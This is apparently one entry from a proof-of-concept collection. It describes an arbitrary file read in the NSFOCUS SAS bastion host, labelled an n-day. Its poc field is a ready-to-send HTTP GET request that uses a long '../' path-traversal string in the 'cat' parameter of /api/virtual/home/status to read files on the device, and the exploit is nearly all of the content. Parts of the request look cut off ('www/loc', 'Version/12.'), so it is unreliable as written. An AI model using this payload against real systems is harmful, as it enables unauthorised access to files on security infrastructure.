vendor = "绿盟"
name = "绿盟sas堡垒机GetFile任意文件读取"
type = "任意文件读取"
source = "TG"
date = "08.14"
poc = "GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/loc Host: 1.1.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12. Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Connection: close"
label = "nday"
